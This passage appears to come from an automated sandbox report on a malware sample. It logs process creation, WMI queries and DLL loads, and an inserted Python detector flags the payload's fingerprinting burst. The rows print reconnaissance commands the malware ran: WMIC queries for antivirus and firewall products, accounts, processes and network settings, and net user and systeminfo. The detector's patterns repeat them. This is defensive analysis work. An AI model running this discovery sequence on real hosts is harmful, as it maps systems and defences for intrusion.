    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="776"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="784"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="872"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="920"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="988"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="364"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="356"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="696"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="592"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1044"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1084"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1176"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1200"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1252"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1296"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1316"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1408"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1476"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1488"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1496"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1552"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1572"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1652"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1724"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1824"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1840"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1940"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1948"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1956"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2036"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1932"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2064"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2152"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2216"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2268"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2388"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2396"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2508"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2528"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2552"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2608"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2616"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2624"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2632"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2748"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2900"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2012"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3304"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3536"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3768"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3816"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4032"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="2544"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3404"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5108"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5484"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5704"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5860"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4920"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1328"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="1668"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3980"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5428"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="6040"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="4868"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3428"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="8064"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="5436"::GetOwner
    Source: C:\Windows\System32\tasklist.exe; WMI Queries: IWbemServices::ExecMethod - root\cimv2 : \\user-PC\root\cimv2:Win32_Process.Handle="3612"::GetOwner
    Source: C:\Windows\explorer.exe; File read: C:\Users\desktop.ini
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: B724.tmp.13.dr; Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: ctMI3TYXpX.exe; ReversingLabs: Detection: 28%
    Source: ctMI3TYXpX.exe; Virustotal: Detection: 38%
    Source: unknown; Process created: C:\Users\user\Desktop\ctMI3TYXpX.exe "C:\Users\user\Desktop\ctMI3TYXpX.exe"
    Source: unknown; Process created: C:\Users\user\AppData\Roaming\jghruer C:\Users\user\AppData\Roaming\jghruer
    Source: C:\Windows\explorer.exe; Process created: C:\Users\user\AppData\Local\Temp\35DB.exe C:\Users\user\AppData\Local\Temp\35DB.exe
    Source: unknown; Process created: C:\Users\user\AppData\Roaming\hdhruer C:\Users\user\AppData\Roaming\hdhruer
    Source: C:\Windows\explorer.exe; Process created: C:\Users\user\AppData\Local\Temp\B972.exe C:\Users\user\AppData\Local\Temp\B972.exe
    Source: unknown; Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
    Source: C:\Users\user\AppData\Local\Temp\B972.exe; Process created: C:\Windows\System32\cmd.exe cmd
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv
    Source: C:\Windows\explorer.exe; Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\ROUTE.EXE route print
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\netsh.exe netsh firewall show state
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\systeminfo.exe systeminfo
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\net.exe net accounts /domain
    Source: C:\Windows\System32\net.exe; Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\net.exe net share
    Source: C:\Windows\System32\net.exe; Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
    Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\net.exe net user
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domainJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net shareJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net userJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
    Source: C:\Windows\System32\net.exeProcess created: unknown unknown
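The process-creation rows above are the host-fingerprinting burst of the dropped payload: cmd.exe, spawned by B972.exe, first asks root\SecurityCenter2 for the installed antivirus, firewall and antispyware products, then walks root\cimv2 for CPU, installed software, physical adapters, autostart entries, OS build and serial, running processes, volumes, local accounts and group membership, computer system and PnP devices, and closes with ipconfig /displaydns, route print, netsh firewall show state, systeminfo, tasklist and net accounts/share/user. Every one of those commands is something an administrator types on its own; the signal is a single parent running many distinct categories of them within seconds. The following is an added example, not part of the Joe Sandbox report or the analysed sample, of scoring that burst over process-creation telemetry. It parses rows in the report's own "Source: parent | Process created: image command line" shape (the separator is optional, so the raw run-together form also parses), tags each child command with a discovery category and flags a parent once it spans several categories. The category names, regexes, the threshold of 4 and the embedded sample rows (a subset of the report's rows plus one constructed benign PowerShell row) are this example's own assumptions.

```python
"""Score process-creation rows for a host-fingerprinting burst.

Added example, not part of the Joe Sandbox report. Category names,
regexes and the threshold are this example's assumptions.
"""
import re
from collections import defaultdict

# Constructed sample: a subset of the report's rows plus one benign
# single-query row (the PowerShell parent) to show what is not flagged.
SAMPLE_LOG = r"""
Source: C:\Users\user\AppData\Local\Temp\B972.exe | Process created: C:\Windows\System32\cmd.exe cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,Version /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,SID /format:csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\netsh.exe netsh firewall show state
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\net.exe net user
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
Source: C:\Windows\System32\net.exe | Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WMIC.exe wmic Path Win32_OperatingSystem Get Caption
"""

# Row shape of the report; the " | " separator is optional so the raw
# run-together "cmd.exeProcess created:" form parses as well.
LINE_RE = re.compile(r"^Source:\s*(?P<parent>.*?)\s*\|?\s*Process created:\s*(?P<cmdline>.*)$")

# Discovery categories (this example's labels) with the ATT&CK technique each maps to.
DISCOVERY_RULES = [
    ("security_products", re.compile(r"SecurityCenter2.*?(AntiVirusProduct|FirewallProduct|AntiSpywareProduct)", re.I)),  # T1518.001
    ("os_and_software",   re.compile(r"Win32_(OperatingSystem|Product)\b|\bsysteminfo\b", re.I)),                          # T1082
    ("hardware",          re.compile(r"Win32_(Processor|ComputerSystem|Volume|PnPEntity)\b", re.I)),                      # T1082
    ("network",           re.compile(r"Win32_NetworkAdapter\b|ipconfig\s+/displaydns|\broute\s+print\b|netsh\s+firewall\s+show", re.I)),  # T1016
    ("processes",         re.compile(r"Win32_Process\b|\btasklist\b", re.I)),                                              # T1057
    ("accounts_shares",   re.compile(r"Win32_(UserAccount|GroupUser)\b|\bnet1?\s+(user|accounts|share)\b", re.I)),         # T1087 / T1135
    ("autostart",         re.compile(r"Win32_StartupCommand\b", re.I)),
]


def parse_events(log_text):
    """Return (parent_image, child_command_line) pairs from report-shaped rows."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append((m.group("parent").strip(), m.group("cmdline").strip()))
    return events


def classify(cmdline):
    """Set of discovery categories a single child command line hits (often empty)."""
    return {label for label, rx in DISCOVERY_RULES if rx.search(cmdline)}


def score_parents(events, min_categories=4):
    """Collapse events per parent image; a parent is flagged once its children
    span at least min_categories distinct discovery categories."""
    cats_by_parent = defaultdict(set)
    for parent, cmdline in events:
        cats_by_parent[parent] |= classify(cmdline)
    return {p: (sorted(c), len(c) >= min_categories) for p, c in cats_by_parent.items()}


if __name__ == "__main__":
    for parent, (cats, flagged) in score_parents(parse_events(SAMPLE_LOG)).items():
        print(("ALERT " if flagged else "      ") + parent + ": " + ", ".join(cats))
```

In real telemetry key the accumulator on the parent's process GUID or PID plus a time window rather than its image path, since every cmd.exe on the host shares the path; the single Win32_OperatingSystem query from the constructed PowerShell parent shows why a per-command rule would be too noisy.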
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Section loaded: msimg32.dll
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exe | Section loaded: msvcr100.dll
    Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
    Source: C:\Windows\explorer.exe | Section loaded: webio.dll
    Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
    Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
    Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
    Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
    Source: C:\Users\user\AppData\Roaming\jghruer | Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Roaming\jghruer | Section loaded: winhttp.dll
    Source: C:\Users\user\AppData\Roaming\jghruer | Section loaded: msimg32.dll
    Source: C:\Users\user\AppData\Roaming\jghruer | Section loaded: msvcr100.dll
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Section loaded: msimg32.dll
    Source: C:\Users\user\AppData\Local\Temp\35DB.exe | Section loaded: msvcr100.dll
    Source: C:\Users\user\AppData\Roaming\hdhruer | Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Roaming\hdhruer | Section loaded: winhttp.dll
    Source: C:\Users\user\AppData\Roaming\hdhruer | Section loaded: msimg32.dll
    Source: C:\Users\user\AppData\Roaming\hdhruer | Section loaded: msvcr100.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: ncrypt.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: winscard.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: winhttp.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: urlmon.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: devobj.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: iertutil.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: srvcli.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: netutils.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: ntasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: windows.storage.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: wldp.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: profapi.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: cryptnet.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: sspicli.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: cryptsp.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: rsaenh.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: cryptbase.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: uxtheme.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: wbemcomn.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: amsi.dll
    Source: C:\Users\user\AppData\Local\Temp\B972.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: apphelp.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: aclayers.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: sfc_os.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\msiexec.exe | Section loaded: msi.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: winbrand.dll
    Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: aepic.dll
    Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: twinapi.dll
